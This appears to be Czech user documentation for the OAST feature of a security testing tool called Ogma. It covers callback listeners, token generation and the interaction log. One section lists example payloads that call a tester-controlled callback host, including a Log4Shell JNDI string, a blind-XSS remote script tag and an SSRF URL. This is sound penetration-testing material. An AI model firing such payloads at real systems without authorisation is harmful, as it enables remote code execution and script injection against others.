OAST
OAST (Out-of-Band Application Security Testing) odhaluje zranitelnosti, které neposkytují viditelnou odpověď – místo toho cíl naváže odchozí spojení s naslouchající službou pod vaší kontrolou, čímž problém potvrdí.
Jak to funguje
Ogma spouští místní naslouchající služby pro více protokolů. Když cílová aplikace kontaktuje některou z nich, interakce se zaznamená spolu se zdrojovou IP adresou, časovým razítkem, přijatými daty a vloženým tokenem.
Protokoly naslouchajících služeb
| Protokol | Výchozí port | Použití |
|---|---|---|
| HTTP | Nastavitelný | SSRF, slepé XSS, webhooky |
| HTTPS | Nastavitelný | SSRF přes TLS |
| DNS | Nastavitelný | Slepá injekce, XXE, log4shell |
| SMTP | Nastavitelný | Injekce do e-mailových hlaviček, SSRF na poštovní služby |
V panelu nastavení OAST nastavte porty naslouchajících služeb a doménové jméno používané ve vygenerovaných tokenech.
Vygenerování tokenu zpětného volání
- Otevřete Pomocné nástroje > OAST.
- Klikněte na + Nový a poté na Vytvořit. Každý token je jedinečný pro daný test.
- Zkopírujte token. Obsahuje doménu vaší naslouchající služby a jedinečný identifikátor, aby bylo možné interakce přiřadit ke konkrétnímu testu.
Příklad formátu tokenu: [unique-id].[your-oast-domain]
Použití tokenů v payloadech
Vložte token zpětného volání do libovolného pole, které může přimět aplikaci navázat odchozí spojení:
- SSRF – použijte token HTTP/HTTPS jako cílovou URL:
https://[token]/ - XXE – odkažte na token v DOCTYPE nebo v URL externí entity.
- Log4Shell – vložte jej do hlavičky:
${jndi:ldap://[token]/a} - Slepé XSS – vložte jej jako src skriptu:
<script src="https://[token]/x.js"></script> - Injekce SMTP – použijte jej jako cílovou adresu nebo URL v e-mailových hlavičkách.
Protokol interakcí
Panel interakcí zobrazuje každé přijaté zpětné volání:
| Sloupec | Popis |
|---|---|
| Čas | Kdy byla interakce přijata |
| Protokol | HTTP, HTTPS, DNS nebo SMTP |
| Zdrojová IP | IP adresa, ze které bylo navázáno spojení |
| Token | Který token byl kontaktován |
| Data | Cesta požadavku, název dotazu DNS nebo data SMTP |
Klikněte na libovolný řádek a zobrazte úplné podrobnosti interakce včetně hlaviček a těla požadavku, pokud jsou pro daný protokol relevantní.
Přiřazování interakcí k testům
Protože je každý token jedinečný, můžete do různých parametrů nebo požadavků vložit různé tokeny a přesně určit, které místo vložení vyvolalo zpětné volání.